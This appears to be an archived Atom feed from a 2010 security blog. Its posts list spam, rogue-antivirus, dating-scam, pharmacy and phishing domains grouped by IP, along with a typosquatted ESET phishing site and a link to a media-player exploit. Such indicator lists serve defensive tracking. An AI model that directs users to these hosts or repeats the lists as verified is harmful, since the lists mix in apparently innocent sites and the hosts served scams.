tag:blogger.com,1999:blog-29922389138996452522010-03-07T06:11:18.410-08:00secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.comBlogger333125tag:blogger.com,1999:blog-2992238913899645252.post-44621013651152960232010-03-07T06:09:00.000-08:002010-03-07T06:11:18.435-08:002010-03-07T06:11:18.435-08:00Spams that flooded in my daily Inbox.<br /><br />www.localactiondating.com<br />www.grefills7.com<br />www.vorkelni.com<br />www.znaijdexo.com<br />fukin4fun.net<br />mkl.placepillsjob.com?zk<br />canadapharmacyonline.com.cn<br />www.aredirect.ru<br />www.onudkulti.com<br />www.jaypeyvve.com<br />ijs.rxonline24.com?ojq<br />www.solvetruck.com<br />www.solvewhite.com<br />www.viagrow-sale.com<br />www.brefills2.com<br />www.rxrefill-07.com<br />f161891.duckminute.ru<br />7d316.liquidwhile.ru<br />7c0e3a8fb357.solvefizz.ru<br />b2d7665eddd120c.trainfound.ru<br />b3e0917d8c.cellhard.ru<br />fccd4baffbbdb8.sayeager.ru<br />76015329d314.hugeraise.ru<br />f885a61073.cleanmodest.ru<br />c73aabf2.handboat.ru<br />c72bb1111e6.socell.ru<br />tre.emv3.comHS?<br />9f9a9f.paintride.ru<br />290aa344cb8379d.ledeast.ru<br />d16f1687705fb.inventhow.ru<br />e10ada.dresstable.ru<br />8e134c4b4ecc467.gardenspoke.ru<br />50ede4c6b70e2.storysay.ru<br />d193c300ea906b0.quzixenov.cn<br />07c83.peakrenown.ru<br />7a5cfd32dc274e.theremove.ru<br />389b5ee9feaaa17.landfire.ru<br />58418dc23f3bd.sincesolve.ru<br />8e3e64f2dd981.railpose.ru<br />2b08130d0c.hascity.ru<br />fyad.org10hre<br />b7644f.tinyroot.ru<br />f9edc657fb9d.endthink.ru<br />04f16fc1a0bf72e.heartbits.ru<br />df7bdb6.choosetingle.ru<br />e66f62d2e4cdf.yibohidum.cn<br />8ddaa8.puporodat.cn<br />c72da9ecd0.zoriduwaq.cn<br />www.jackpotspree.net<br />a07a339acf88c.bibigemos.cn<br />352caff98.desertgreat.ru<br />29f174354f53f.relaxfinest.ru<br />c76b4a2c918a.cornseed.ru<br />88712.ohbeauty.ru<br />gkh.fafuseqiq.cn<br />5d67c3b9acaff3.wifelook.ru<br />02505.waitwhose.ru<br />c268c.samerange.ru<br />1da38cba1322d.chairrange.ru<br />0b3aa64.prizeprove.ru<br />073401fda70d.shoeswell.ru<br />b8b68b4a30.actalive.ru<br />75b6a75f.guidepure.ru<br />8188164f89.richcell.ru<br />0ad50d1812.groupplane.ru<br />831b1944241.flowguide.ru<br />9bf3dd25eb7.cuddlymeek.ru<br />be9791dd3f68.southsuperb.ru<br />b491cdba4edb066.valleyfound.ru<br />8f448f3e7bd.poundanswer.ru<br />23c21095ce49cd.hearspread.ru<br />8109fbda833303.famousdoor.ru<br />330cf5d214bd3.poemfoot.ru<br />164ac.chordwait.ru<br />c0af17.chordlate.ru<br />dc581406.yulestreet.ru<br />85b439de60c49.cottonorgan.ru<br />75130dcf.sensecolor.ru<br />3508ae.quietlevel.ru<br />846a88.kecejazos.cn<br />hrz.ultimatepharmdrive.com<br />f58a6fc2e472.wuzagutok.cn<br />8ea660659942a6.demuqoxim.cn<br />9a7d028caf52.teachwall.ru<br />6087781d9e5e.thelate.ru<br />18a335065bae4.threeglad.ru<br />ireporters.keyringl.net<br />e55eab.majornew.ru<br />61cfe24faf79a4b.squaretingle.ru<br />764db.thingtiny.ru<br />b72987832.loftygather.ru<br />3d8784b608f26f.causewell.ru<br />5636e549f53.thingstood.ru<br />76d67.thanmeet.ru<br />b58b85c978d7aa.politecotton.ru<br />free-bizzz.comindex.php<br />22696541099b9b7.studybeat.ru<br />3c813edb0.coursestood.ru<br />a62c76edfcddc06.classeach.ru<br />529e965c9d43a.dimplemuch.ru<br />16cb7cc.lookfriend.ru<br />51c0f1c10a85.creasesexy.ru<br />97142.supplyperson.ru<br />ac844465ee7.jewelband.ru<br />7169d.lakereach.ru<br />61e85d2.helpparent.ru<br />ad5c53c9453731a.pullfinish.ru<br />9d02fc69b734f88.smoothjoin.ru<br />c8786521f53f178.meantdrink.ru<br />4d129fc1997.gigglespruce.ru<br />c1f3d8ce084df1.didschool.ru<br />2cb911c30.deluxequart.ru<br />6fb7aa6dc3385d.settlesudden.ru<br />8ce06af668e3bb.loftyflower.ru<br />b2b8fec4529ef.aglowdecide.ru<br />b3013932.behindby.ru<br />5b753b.oilraise.ru<br />fc571ee6cda5.mayfeed.ru<br />f767b848319.rosewill.ru<br />91a6a820850c891.rangetoward.ru<br />638c9a120.salttop.ru<br />15d2b3d41020d17.breakrenown.ru<br />eed6644ecd.renownverb.ru<br />cf36912.boardmove.ru<br />235811.wintermonth.ru<br />e5f7322d89.nowgentle.ru<br />d7f5ce46a7.fizzable.ru<br />163dfc11a91.factpalate.ru<br />9e030191b.multimakey.ru<br />4626bb00fec37.marketrace.ru<br />cb9060e65.inventbroad.ru<br />4fbff46f6547.piecedrop.ru<br />aae19734f.rubgolden.ru<br />760000ef9c4d.exoticswell.ru<br />b23588b9dd4dd43.lucidtrain.ru<br />ca35dd3efce.pearlput.ru<br />dab256de9d11.caretop.ru<br />27459fded1668.ropespace.ru<br />2f4057da.backson.ru<br />85464d2.designwow.ru<br />a9fc169.werise.ru<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-4462101365115296023?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/oBnPMYvWcHRwBgNS_Wr_dhLtddQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/oBnPMYvWcHRwBgNS_Wr_dhLtddQ/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/oBnPMYvWcHRwBgNS_Wr_dhLtddQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/oBnPMYvWcHRwBgNS_Wr_dhLtddQ/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2010/03/spam-07-march-10.htmltag:blogger.com,1999:blog-2992238913899645252.post-26688833867501557862010-01-22T05:49:00.000-08:002010-01-22T05:55:41.372-08:002010-01-22T05:55:41.372-08:00IP: 62.90.136.210<br /><br />becomesantyvirus.net<br />bestalltools.com<br />bestfoodtest.com<br />goodantyviruspillnow.com<br />homeboxsecurity.com<br />inspectallrealty.com<br />luckvirustoolbox.com<br />mail.bentestsite.com<br />mail.bestalltools.com<br />mail.bestfoodtest.com<br />mail.excavatevirustool.net<br />mail.goodantyviruspillnow.com<br />mail.inspectallrealty.com<br />mail.luckvirustoolbox.com<br />mail.maybeantispyware.net<br />mail.mynewvirusbex.com<br />mail.onlineantispywareremo.com<br />mail.paycyberbill.com<br />mail.scanlifetimeonline.com<br />mail.scantechindia.com<br />mail.securytybnasty.com<br />mail.thecheckcredit.com<br />mail.thetoolsbargain.com<br />mail.yourantivirusscan.com<br />maybeantispyware.net<br />mynewvirusbex.com<br />ns1.bentestsite.com<br />ns1.bestfoodtest.com<br />ns1.cuttingutilities.com<br />ns1.homeboxsecurity.com<br />ns1.inspectallrealty.com<br />ns1.mynewvirusbex.com<br />ns1.scantechindia.com<br />onlineantispywareremo.com<br />paycyberbill.com<br />scanlifetimeonline.com<br />startingantivirus.net<br />scantechindia.com<br />thecheckcredit.com<br />thetoolsbargain.com<br />www.bestalltools.com<br />www.cuttingutilities.com<br />www.gameonlinesite.com<br />www.nowhomesecurity.com<br />www.thetoolsbargain.com<br />www.websecurityswitch.com<br />yourantivirusscan.com<br /><br /><br />IP: 62.90.136.211<br /><br />ns2.bentestsite.com<br />ns2.bestfoodtest.com<br />ns2.cuttingutilities.com<br />ns2.homeboxsecurity.com<br />ns2.inspectallrealty.com<br />ns2.mynewvirusbex.com<br />ns2.scantechindia.com<br /><br /><br /><br />IP: 62.90.136.207<br /><br />dating0marriage.net<br />destinycombine.net<br />healthe-lovesite.com<br />ifound-thelove.net<br />join-destinies.net<br />lonely-heart-waiting.com<br />love-formeandyou.com<br />love-greatthing.com<br />love-isaclick.com<br />love-me-cares.net<br />love-onlylove.com<br />loveand-only.com<br />loveiskiss.com<br />mail.and-i-loveyoutoo.com<br />mail.dating0marriage.net<br />mail.destinycombine.net<br />mail.healthe-lovesite.com<br />mail.heartconections.net<br />mail.ifound-thelove.net<br />mail.join-destinies.net<br />mail.lonely-heart-waiting.com<br />mail.love-formeandyou.com<br />mail.love-galaxys.com<br />mail.love-greatthing.com<br />mail.love-isaclick.com<br />mail.love-isexcellent.net<br />mail.love-me-cares.net<br />mail.love-onlylove.com<br />mail.love-youloves.com<br />mail.loveand-only.com<br />mail.loveishunt.com<br />mail.meet-the-lovedestiny.com<br />mail.world-1meetlove.com<br />mail.yourdestinyhere.net<br />mail.yourmatchwith.net<br />meet-the-lovedestiny.com<br />ns1.createyourlove.net<br />ns1.loveattaches.net<br />ns2.one-serv.net<br />only-loveall.com<br />www.and-i-loveyoutoo.com<br />www.best-only-love.com<br />www.crystalic-love.com<br />www.destinycombine.net<br />www.destinycontacts.net<br />www.feel-freewithlove.com<br />www.flirt-withmedirect.com<br />www.found-thelove.com<br />www.healthe-lovesite.com<br />www.heartconections.net<br />www.ifound-thelove.net<br />www.join-destinies.net<br />www.lonely-heart-waiting.com<br />www.love-formeandyou.com<br />www.love-is-special.com<br />www.love-isaclick.com<br />www.love-me-cares.net<br />www.love-youloves.com<br />www.loveishunt.com<br />www.matchwithworld.net<br />www.meet-nowlove.com<br />www.meet-the-lovedestiny.com<br />www.myheart-hwithlove.com<br />www.only-loveall.com<br />www.romance-hunting.com<br />www.tenderwoman.net<br />www.world-1meetlove.com<br />www.yourdestinyhere.net<br />www.yourmatchwith.net<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2668883386750155786?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/bWvtlIHtwuLycK93P29DK02KhXQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/bWvtlIHtwuLycK93P29DK02KhXQ/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/bWvtlIHtwuLycK93P29DK02KhXQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/bWvtlIHtwuLycK93P29DK02KhXQ/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2010/01/rogue-antivirus-and-spams-22-jan.htmltag:blogger.com,1999:blog-2992238913899645252.post-78701936789350359672010-01-20T08:19:00.000-08:002010-01-20T08:27:50.766-08:002010-01-20T08:27:50.766-08:00ESET is one of the famous antivirus security vendor in the security field. If users accidentally browse to www.eset32.net instead of www.eset.com. Then you better careful on what you browse.<br /><br />www.eset32.net (78.108.84.16)<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/S1cuXj8wvyI/AAAAAAAAA7A/bqobrB9fOZY/s1600-h/eset-net.PNG"><img style="cursor: pointer; width: 272px; height: 320px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/S1cuXj8wvyI/AAAAAAAAA7A/bqobrB9fOZY/s320/eset-net.PNG" alt="" id="BLOGGER_PHOTO_ID_5428858858140385058" border="0" /></a><br /><br />www.eset.com<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1cuYDRQ6LI/AAAAAAAAA7I/Jn-qB-LMWLI/s1600-h/eset-com.PNG"><img style="cursor: pointer; width: 320px; height: 310px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1cuYDRQ6LI/AAAAAAAAA7I/Jn-qB-LMWLI/s320/eset-com.PNG" alt="" id="BLOGGER_PHOTO_ID_5428858866547878066" border="0" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-7870193678935035967?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/JnfaJ1y7Tjp_UQKxgzN1C7z6ZOA/0/da"><img src="http://feedads.g.doubleclick.net/~a/JnfaJ1y7Tjp_UQKxgzN1C7z6ZOA/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/JnfaJ1y7Tjp_UQKxgzN1C7z6ZOA/1/da"><img src="http://feedads.g.doubleclick.net/~a/JnfaJ1y7Tjp_UQKxgzN1C7z6ZOA/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2010/01/eset-phishing-website.htmltag:blogger.com,1999:blog-2992238913899645252.post-20168125402022267982010-01-19T07:51:00.000-08:002010-01-19T07:53:16.655-08:002010-01-19T07:53:16.655-08:00Rogue Antivirus<br /><br />IP address: 69.31.84.26<br /><br />*.antivirus360.ru<br />*.nalunu.net<br />*.oemmarketplace.com<br />*.windows-security-update.com<br />antivirus360.ru<br />greenh.info<br />hostmaster.antivirus360.ru<br />hostmaster.nalunu.net<br />hostmaster.oemmarketplace.com<br />mail.antivirus360.ru<br />mail.nalunu.net<br />mail.oemmarketplace.com<br />mail.windows-security-update.com<br />ns1.windows-security-update.com<br />ns2.antivirus360.ru<br />ns2.nalunu.net<br />ns2.oemmarketplace.com<br />ns2.windows-security-update.com<br />oemmarketplace.com<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2016812540202226798?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/oTxtz-Zv3ihWtr8dFNaGQ-iP3iQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/oTxtz-Zv3ihWtr8dFNaGQ-iP3iQ/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/oTxtz-Zv3ihWtr8dFNaGQ-iP3iQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/oTxtz-Zv3ihWtr8dFNaGQ-iP3iQ/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2010/01/antivirus360ru-rogue-av.htmltag:blogger.com,1999:blog-2992238913899645252.post-59453989423844800682010-01-18T07:08:00.000-08:002010-01-18T07:11:08.244-08:002010-01-18T07:11:08.244-08:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/S1R51_w7MxI/AAAAAAAAA64/wUp1V4sAvRQ/s1600-h/MediaPlayer.PNG"><img style="cursor: pointer; width: 320px; height: 146px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/S1R51_w7MxI/AAAAAAAAA64/wUp1V4sAvRQ/s320/MediaPlayer.PNG" alt="" id="BLOGGER_PHOTO_ID_5428097419444957970" border="0" /></a><br /><br /><br /><br />Reference:<br /><br /><span style="font-weight: bold;">http://sebug.net/exploit/18957/</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-5945398942384480068?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/zIkcg_K-4Du9iisneARwnc3dEu4/0/da"><img src="http://feedads.g.doubleclick.net/~a/zIkcg_K-4Du9iisneARwnc3dEu4/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/zIkcg_K-4Du9iisneARwnc3dEu4/1/da"><img src="http://feedads.g.doubleclick.net/~a/zIkcg_K-4Du9iisneARwnc3dEu4/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2010/01/vulnerability-in-windows-media-player.htmltag:blogger.com,1999:blog-2992238913899645252.post-58347025009541190712010-01-18T06:30:00.000-08:002010-01-18T06:34:39.765-08:002010-01-18T06:34:39.765-08:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1RxK4r44iI/AAAAAAAAA6w/lWvSEzlCl_g/s1600-h/PureAcaiElite.PNG"><img style="cursor: pointer; width: 320px; height: 229px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1RxK4r44iI/AAAAAAAAA6w/lWvSEzlCl_g/s320/PureAcaiElite.PNG" alt="" id="BLOGGER_PHOTO_ID_5428087882717389346" border="0" /></a><br /><br /><br />82.129.25.122<br /><br />absoluteacaiberry.com<br />acaipowermax.com<br />mail.powerfulacai.com<br />powerfulacai.com<br />prohealthcleanse.com<br />redantiox.com<br />strongcolon.com<br />tryjunpurecleanse.com<br />www.absoluteacaiberry.com<br />www.acaipowermax.com<br />www.antioxwine.com<br />www.efficientacai.com<br />www.perfectbenefitacai.com<br />www.powerfulacai.com<br />www.prohealthcleanse.com<br />www.pureacaielite.com<br />www.redantiox.com<br />www.strongcolon.com<br />www.xtraresveratrol.com<br />www.youthcleanse.com<br />xtraresveratrol.com<br />youthcleanse.com<br /><br />82.129.25.123<br /><br />antioxwine.com<br />efficientacai.com<br />mail.efficientacai.com<br />mail.perfectbenefitacai.com<br />perfectbenefitacai.com<br />www.absoluteacaiberry.com<br />www.acaipowermax.com<br />www.antioxwine.com<br />www.efficientacai.com<br />www.perfectbenefitacai.com<br />www.powerfulacai.com<br />www.prohealthcleanse.com<br />www.pureacaielite.com<br />www.redantiox.com<br />www.strongcolon.com<br />www.xtraresveratrol.com<br />www.youthcleanse.com<br /><br /><br />93.188.248.182<br /><br />www.absoluteacaiberry.com<br />www.acaipowermax.com<br />www.antioxwine.com<br />www.efficientacai.com<br />www.perfectbenefitacai.com<br />www.powerfulacai.com<br />www.prohealthcleanse.com<br />www.pureacaielite.com<br />www.redantiox.com<br />www.strongcolon.com<br />www.xtraresveratrol.com<br />www.youthcleanse.com<br /><br />93.188.248.183<br /><br />www.absoluteacaiberry.com<br />www.acaipowermax.com<br />www.antioxwine.com<br />www.efficientacai.com<br />www.perfectbenefitacai.com<br />www.powerfulacai.com<br />www.prohealthcleanse.com<br />www.pureacaielite.com<br />www.redantiox.com<br />www.strongcolon.com<br />www.xtraresveratrol.com<br />www.youthcleanse.com<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-5834702500954119071?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/Xrh9jq7TS4GIMtGZYEyR4JilTV4/0/da"><img src="http://feedads.g.doubleclick.net/~a/Xrh9jq7TS4GIMtGZYEyR4JilTV4/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/Xrh9jq7TS4GIMtGZYEyR4JilTV4/1/da"><img src="http://feedads.g.doubleclick.net/~a/Xrh9jq7TS4GIMtGZYEyR4JilTV4/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2010/01/pureacai-elite-spam.htmltag:blogger.com,1999:blog-2992238913899645252.post-31408889771253483892010-01-12T08:22:00.000-08:002010-01-12T08:25:55.801-08:002010-01-12T08:25:55.801-08:0091.208.228.78<br />www.canadamedications-home.com<br /><br />222.170.127.122<br />email-connect.com<br />email-mailbox.com<br />emailfriendz.com<br />fuckbook-abrams.info<br />fuckbook-cabral.com<br />fuckbook-dale.com<br />mailbox-email.com<br />www.fuckbook-baca.com<br />www.fuckbook-cabral.com<br />www.fuckbook-dale.com<br />www.fuckbook-DALEY.com<br />www.fuckbook-CABRERA.com<br />www.fuckbook-BABIN.com<br />www.fuckbook-BACHMAN.com<br /><br />124.248.32.48<br />prettymoral.com<br />www.fakipokap.cn<br />www.behofuhej.cn<br />www.mipuzukok.cn<br />www.wahumxh.cn<br /><br />210.212.30.131<br />yeckydmai.com<br />*.medsmedicinedirect.com<br />*.nucquyfro.com<br />*.pailetrepf.com<br />*.qugoqudal.com<br />*.rhopnizelj.com<br />*.rvaulybvoa.com<br />*.superstoremeds.com<br />*.supertabletpillshealth.com<br />*.superwellbeing.net<br />*.unnaxedy.com<br />*.utvorehdufa.com<br />*.wisuilufmo.com<br />*.yupnyojrufl.com<br />*.zmautnipvy.com<br />admin.nucquyfro.com<br />admin.pharmacybetterhealth.com<br />admin.rxtabletshealth.com<br />admin.vomhequnn.com<br />mail.nucquyfro.com<br />mail.pailetrepf.com<br />mail.pharmacybetterhealth.com<br />mail.qugoqudal.com<br />mail.relcuhebi.com<br />mail.rxtabletshealth.com<br />mail.ryudfyvduaw.com<br />mail.supertabletpillshealth.com<br />mail.tabletownhealthrx.com<br />mail.yupdytytix.com<br />medsmedicinedirect.com<br />ns1.medsmedicinedirect.com<br />ns1.mrihahve.com<br />ns1.nucquyfro.com<br />ns1.pharmacybetterhealth.com<br />ns1.qugoqudal.com<br />ns1.relcuhebi.com<br />ns1.sohfevevyl.com<br />ns1.supertabletpillshealth.com<br />ns1.uyrfyucli.net<br />ns1.vomhequnn.com<br />ns1.yotgorjyu.com<br />ns2.medsmedicinedirect.com<br />ns2.mrihahve.com<br />ns2.nucquyfro.com<br />ns2.relcuhebi.com<br />ns2.rxcapsuleshealth.com<br />ns2.rxtabletshealth.com<br />ns2.vomhequnn.com<br />qukmifnuo.com<br />rhopnizelj.com<br />rvaulybvoa.com<br />rxdrugstorenew.com<br />ryudfyvduaw.com<br />sohfevevyl.com<br />sreljeowy.com<br />superstoremeds.com<br />superwellbeing.net<br />tabletownhealthrx.com<br />tluncimavv.com<br />uisdovykwe.net<br />unnaxedy.com<br />upmevpuoto.com<br />utvorehdufa.com<br />whugyrgip.com<br />yotgorjyu.com<br />yupdytytix.com<br />zmautnipvy.com<br />pharmacybetterhealth.com<br />qugoqudal.com<br />relcuhebi.com<br />rxtabletshealth.com<br />supertabletpillshealth.com<br />tabletownhealthrx.com<br />yupdytytix.com<br /><br /><br />121.127.132.144<br />*.abotrcue.cn<br />abotrcue.cn<br />admin.abotrcue.cn<br />www.abotrcue.cn<br />www.abxlwwue.cn<br /><br /><br />116.123.221.214<br />*.25vip-2010.com<br />*.krapobraves.com<br />*.savolinosas.net<br />*.vip52-2010.com<br />25vip-2010.com<br />krapobraves.com<br />drugsmunmro37a.net<br />ns1.krapobraves.com<br />ns1.savolinosas.net<br />ns2.krapobraves.com<br />ns2.savolinosas.net<br />ns3.krapobraves.com<br />ns3.savolinosas.net<br />ns4.krapobraves.com<br />ns4.savolinosas.net<br />savolinosas.net<br />www.25vip-2010.com<br /><br />61.235.117.75<br />*.loxuzaqad.cn<br />64d4.loxuzaqad.cn<br />loxuzaqad.cn<br />sir-t.cn<br />xyu-bam.cn<br /><br /><br />174.132.227.82<br />*.mediafilestorage.net<br />*.redirto.com<br />2009tatil.com<br />2rabweb.com<br />ajecto.com<br />ajecto.ru<br />ancestrykey.com<br />arezdagasket.com<br />arezdapurnamaloka.com<br />articulatehosting.com<br />backbonetek.com<br />bihepinc.com<br />bistrooncinders.com<br />bizozguruz.com<br />buycallawaygolf.info<br />capoeiraphilippines.com<br />cheapcanoncamera.us<br />cheapnikoncamera.us<br />cholerias.com<br />clubtrikolik.net<br />conceptekilibre.com<br />cyberkraft.in<br />deercee.com<br />desainy.com<br />designtweaks.com<br />eastwestinteractive.com<br />elianceconnectronics.com<br />exploreruralhimalayas.com<br />favotec.net<br />federalgrantexpress.com<br />federalgrantsacademy.com<br />federalgrantsmoney.com<br />fekrapro.com<br />fofotara.com<br />forexbreakingnews.com<br />forwebsites.net<br />friendsteroutline.com<br />gands-contracting.com<br />gateturkey.com<br />globalscreenings.com<br />goaseahomes.com<br />gokovabelediyesi.com<br />hosting.ajecto.com<br />hostregion.com<br />iammundee.com<br />igamblefree.com<br />infobailes.com<br />inveway.com<br />island21.org<br />itsaboutdelhi.com<br />itsaboutdelhi.info<br />janabenitez.net<br />jhc2004.com<br />jmzgroup.com<br />joco-ceramics.com<br />klipizlex.net<br />kozlukuyu.com<br />lamoxiegroup.com<br />lankaemail.com<br />learngermanreviews.com<br />learningfrenchcritic.com<br />learnjapanesequickly.com<br />lofotentaxi.com<br />logger32.net<br />lvumanpower.com<br />mail.hrlink.vn<br />metasys.in<br />metasystech.com<br />modblog.net<br />mohammedjamal.info<br />mylastamen.net<br />newenglandnswdirectory.com<br />ns1.cyberkraft.in<br />ns1.fofotara.com<br />officechairsale.info<br />olimpiyatevi.com<br />onlineurdu.com<br />outboardassist.com<br />placiahotel.com<br />portalmedia.com.au<br />ppmq.org<br />printersworldnetwork.com<br />profoundstupidity.net<br />pvhc.net<br />qaqarat.com<br />radyogazete.com<br />raggedangel.net<br />recliningofficechair.info<br />rtowebsolution.com<br />s8ft.com<br />s8ft.net<br />sandeshaya.com<br />scrappyshop.com<br />secureend.com<br />shogungsm.com<br />sirijayasri.com<br />sparkpixel.com<br />ssctindia.org<br />stockfuture.org<br />superlinkkuwait.com<br />thetimbers.net<br />todaytrading.com<br />trikolik.com<br />ventana7.com<br />waterfallwaydesigns.com<br />wolkacentrum.com<br />woodsnwatertaxidermy.net<br />worldads.tk<br />wrkondreamz.org<br />www.hostregion.com<br />www.igamblefree.com<br />www.learningfrenchcritic.com<br />www.mediafilestorage.net<br />www.metasystech.com<br />www.onlineurdu.com<br />www.profoundstupidity.net<br />www.redirto.com<br />www.s8ft.com<br />www.worldads.tk<br />yaoo.net<br />zilla.ru<br /><br /><br />61.61.20.162<br />vujehewis.cn<br /><br /><br />69.16.253.125<br />shibdassmetals.com<br />aamantrandelhi.com<br />aaradhyaindia.org<br />activedesign.org<br />adaindia.in<br />agencyverticals.com<br />amayaclinic.com<br />andamanchronicle.com<br />anika.in<br />artcollegechandigarh.org<br />auramall.in<br />batha-ads.org<br />bharatinstitutes.org<br />bhilai85sss4.com<br />bishnoism.com<br />bumsumshi.com<br />canineelite.com<br />castleton.co.in<br />cgmfpfed.org<br />cgnewsupdate.com<br />chamberoflaw.com<br />chanakyagroup.org<br />computerithub.com<br />csvtu.ac.in<br />dainiksandhyaprakash.com<br />dcbgirlscollegejorhat.org<br />divineskincareindia.com<br />effluxtechnologies.com<br />ewaytech.net<br />fcyr.org<br />floralart.co.in<br />flowersofindia.net<br />forgeter.com<br />frontalagritech.co.in<br />futuregold.in<br />goenkaeducation.org<br />golaghatcommercecollege.org<br />grand-resort.co.in<br />grandplaza.co.in<br />graphicreflections.org<br />gurunanakinstitutes.com<br />guwahatione.com<br />harieducation.org<br />historicalroutes.com<br />hojoindia.com<br />horizoninfosys.org<br />iescp.org<br />iietjind.com<br />iirmr.net<br />iiwchennai.org<br />indianincenseonline.com<br />indiapackersmovers.net<br />indicurecosmeticsurgery.com<br />indicurerehabilitation.com<br />indoswiss.net<br />inld.biz<br />innomark.in<br />invernessmedicalindia.com<br />irps.in<br />itsbhiwani.com<br />jandaood.co.in<br />jangsher.com<br />jundokan-gojuryu.org<br />kaliaborcollege.org<br />kalikavu.com<br />karaninstitutes.com<br />kovaisales.com<br />krninstitute.com<br />kundan.co.in<br />lokdcollegedhekiajuli.org<br />loyalcomputers.net<br />lscp.ac.in<br />maharishichannel.net<br />mail.guwahatione.com<br />mail.irps.in<br />malaysiatravelcentre.in<br />manugill.info<br />mprexports.com<br />myeducationfunda.com<br />navsiddharthaartgroup.org<br />newsite.in<br />nitakumar.net<br />noidamalls.com<br />nrenterprisesindia.org<br />ns1.webcomindia.net<br />optigolfindia.com<br />paramountwebsolution.com<br />rangaparacollege.org<br />regularnetwork.com<br />resalemachines.biz<br />rnemcrohtak.org<br />saijewel.com<br />shahoils.com<br />sitapurmahotsava.com<br />smrealtors.in<br />sodaltech.in<br />solomontechnologies.org<br />spreadsnet.org<br />sripipefitting.com<br />ssrealestate.co.in<br />stssociety.org<br />techvoteindia.com<br />thinnkware.com<br />travtourindia.com<br />trtcguwahati.org<br />truevirtues.net<br />ttcpkc.org<br />uttarakhandtourism.net<br />verb.co.in<br />visa-trans.com<br />vtirohtak.org<br />waytonikah.com<br />whisperingpines.co.in<br />wiwbee.com<br />worldtrademarkpatent.com<br />www.agencyverticals.com<br />www.indiapackersmovers.net<br />www.internet20.org<br />www.kovaisales.com<br />xoftoasis.com<br /><br /><br /><br />67.19.250.209<br />101freetools.com<br />anevakateva.info<br />cefnacaribbean.com<br />d1.fa.1343.static.theplanet.com<br />dbcindia.in<br />doriashowerfilter.com<br />eispilates.com<br />jonahproject.net<br />kish-health.org<br />lifeinsurancepolicy-401k.com<br />lifestyledecorate.com<br />mail.eispilates.com<br />michaeljacksonisntdead.net<br />mollymckay.net<br />monarchturf.com<br />monicagallo.com<br />saqconsultor.com<br />shambletrain.com<br />sweethomealternative.com<br />takeabow.info<br />terencedunn.com<br />tjwinegardner.com<br />www.eispilates.com<br />www.kish-health.org<br />www.mollymckay.net<br /><br /><br />66.197.212.102<br />tv4free.8k.ro<br />free.8k.ro<br />support.8k.ro<br /><br />195.70.35.216<br />palfalvi.hu<br />*.karosinfo.hu<br />a1taxi.hu<br />ago-sport.hu<br />agrarplaza.com<br />akkumulator.net<br />americarservice.hu<br />amerikai-autoszerviz.hu<br />aquamasters.hu<br />barkoczy.net<br />bekecsaba.hu<br />bollobas.hu<br />bonolact.com<br />bordersped.com<br />ceramiceurope.com<br />cityhit.net<br />dentorient.net<br />dxantech.com<br />dynamictours.hu<br />e-mpire.hu<br />euceramic.com<br />euceramicmarket.com<br />euhunting.com<br />eutilemarket.com<br />eutileshop.com<br />ferienhaus-fort.com<br />fewo-fort.com<br />furdoruha.com<br />gasztroenterologus.com<br />gaviascience.com<br />geier.hu<br />gesta.hu<br />gesztenyes.hu<br 